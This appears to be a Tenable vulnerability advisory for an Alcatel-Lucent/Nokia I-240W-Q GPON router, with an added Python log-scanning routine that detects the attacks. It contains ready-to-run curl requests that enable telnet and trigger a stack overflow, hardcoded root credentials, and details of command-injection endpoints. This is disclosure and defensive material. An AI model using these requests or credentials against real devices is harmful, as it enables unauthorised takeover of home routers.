Synopsis
While investigating an Alcatel Lucent I-240W-Q GPON ONT with firmware 3FE54567BOZJ19, Tenable discovered multiple vulnerabilities. Note that the business unit that maintained the I-240W-Q was purchased by Nokia.
CVE-2019-3917: Remote Enabling of Telnet
Telnet is not enabled by default. However, a remote unauthenticated attacker can enable telnet on the device by sending an HTTP request.
curl http://[router ip]/ote
The attacker can also disable the telnet service.
curl http://[router ip]/otd
This vulnerability is documented in some old security blogs, but no patch was put out and no CVE was ever assigned.
CVE-2019-3918: Hard Coded Credentials
The device has a handful of hardcoded credentials:
- root/admin (telnet)
- root/huigu309 (telnet)
- CRAFTSPERSON/ALC#FGU (telnet)
- ONTUSER/SUGAR2A041 (ssh)
CVE-2019-3919: Authenticated Command Injection (usb_restore_Form)
The endpoint /GponForm/usb_restore_Form?script/ is vulnerable to blind command injection via the usb_partition parameter. A remote, authenticated attacker can use this vulnerability to execute arbitrary commands or programs on the device (e.g. dropbear).
CVE-2019-3920: Authenticated Command Injection (device_Form)
The endpoint /GponForm/device_Form?script/ is vulnerable to blind command injection via the usb_partition parameter. A remote, authenticated attacker can use this vulnerability to execute arbitrary commands or programs on the device (e.g. dropbear).
CVE-2019-3921: Authenticated Stack Buffer Overflow in WebMgr
The WebMgr process handles HTTP POST requests sent to /GponForm/usb_Form?script/. A number of the form's parameters can be overflowed with unexpectedly long values. Example parameters: ftpusername, ftppassword1, ftpdirname, clientusername, clientpassword, urlbody, and webdir. They all generate a similar backtrace:
(gdb) bt
#0  0x41414140 in ?? ()
#1  0x401156c0 in bfree () from /usr/lib/libWebs.so
Cannot access memory at address 0x4141413d
(gdb) info registers
r0             0x208               520
r1             0x391a8             233896
r2             0x4012a590          1074963856
r3             0x5                 5
r4             0x41414141          1094795585
r5             0x41414141          1094795585
r6             0x41414141          1094795585
r7             0x41414141          1094795585
r8             0x41414141          1094795585
r9             0x41414141          1094795585
r10            0x41414141          1094795585
r11            0x41414141          1094795585
r12            0xbefb9108          3204157704
sp             0x41414141          0x41414141
lr             0x401156c0          1074878144
pc             0x41414140          0x41414140
fps            0x0                 0
cpsr           0x20000030          536870960
CVE-2019-3922: Unauthenticated Stack Buffer Overflow in WebMgr
A remote unauthenticated attacker can send the following request to /GponForm/fsetup_Form and trigger a stack buffer overflow.
curl -i -s -k -X $'POST' \ -H $'Host: 192.168.1.1' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Referer: http://192.168.1.1/fsetup.html' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 1443' -H $'Cookie: hibext_instdsigdipv2=1; _ga=GA1.1.1081495671.1538484678' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \ -b $'hibext_instdsigdipv2=1; _ga=GA1.1.1081495671.1538484678' \ --data-binary $'XWebPageName=fsetup&XSetup=wifi&loid_user=AAA&loid_psw=&pppoe_user=&pppoe_psw=&wifi_ssid=ChinaNet-AAAA&wifi_ch=4&wifi_enc=3&wifi_psw=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' \ $'http://192.168.1.1/GponForm/fsetup_Form'
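Added example (not part of the Tenable advisory): a small log-scanning routine that flags the request patterns behind CVE-2019-3917 (GET /ote or /otd), CVE-2019-3919/3920 (POSTs to the two command-injection form handlers) and CVE-2019-3921/3922 (oversized POST bodies to the overflow-prone form handlers). The log format, the sample lines and the 1024-byte body threshold are assumptions chosen for this example; the device's own logging may differ.

```python
import re

# Constructed sample lines (not real device logs): common log format with the
# request body size appended as a final field.
SAMPLE_LOG = """\
192.168.1.50 - - [10/Jan/2019:10:00:01 +0000] "GET /ote HTTP/1.1" 200 12 0
192.168.1.50 - - [10/Jan/2019:10:00:05 +0000] "GET /index.html HTTP/1.1" 200 4511 0
192.168.1.77 - - [10/Jan/2019:10:02:11 +0000] "POST /GponForm/fsetup_Form HTTP/1.1" 200 0 1443
192.168.1.20 - - [10/Jan/2019:10:03:00 +0000] "POST /GponForm/fsetup_Form HTTP/1.1" 200 0 180
192.168.1.77 - - [10/Jan/2019:10:04:09 +0000] "POST /GponForm/usb_restore_Form?script/ HTTP/1.1" 200 0 96
192.168.1.50 - - [10/Jan/2019:10:05:30 +0000] "GET /otd HTTP/1.1" 200 12 0
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<resp>\d+|-) (?P<body>\d+)$'
)

TELNET_TOGGLE = {"/ote", "/otd"}                        # CVE-2019-3917
CMD_INJECTION_FORMS = {"/GponForm/usb_restore_Form",    # CVE-2019-3919
                       "/GponForm/device_Form"}         # CVE-2019-3920
OVERFLOW_FORMS = {"/GponForm/fsetup_Form",              # CVE-2019-3922
                  "/GponForm/usb_Form"}                 # CVE-2019-3921
# Assumed threshold: legitimate setup forms are short; a body this large is
# consistent with the long-parameter overflows described in the advisory.
OVERFLOW_BODY_BYTES = 1024


def classify(line):
    """Return an alert dict for a suspicious request, or None for benign/unparsable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    method, body = m.group("method"), int(m.group("body"))
    path = m.group("path").split("?", 1)[0]          # drop the "?script/" suffix
    alert = {"src": m.group("src"), "ts": m.group("ts"), "path": path, "body": body}
    if method == "GET" and path in TELNET_TOGGLE:
        return {**alert, "rule": "CVE-2019-3917"}
    if method == "POST" and path in CMD_INJECTION_FORMS:
        return {**alert, "rule": "CVE-2019-3919/3920"}
    if method == "POST" and path in OVERFLOW_FORMS and body >= OVERFLOW_BODY_BYTES:
        return {**alert, "rule": "CVE-2019-3921/3922"}
    return None


def scan(log_text):
    """Scan a block of log text and return the list of alerts in log order."""
    return [a for a in (classify(l) for l in log_text.splitlines()) if a]
```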
Solution
Additional References
Disclosure Timeline
All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.
Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.
For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.
If you have questions or corrections about this advisory, please email [email protected]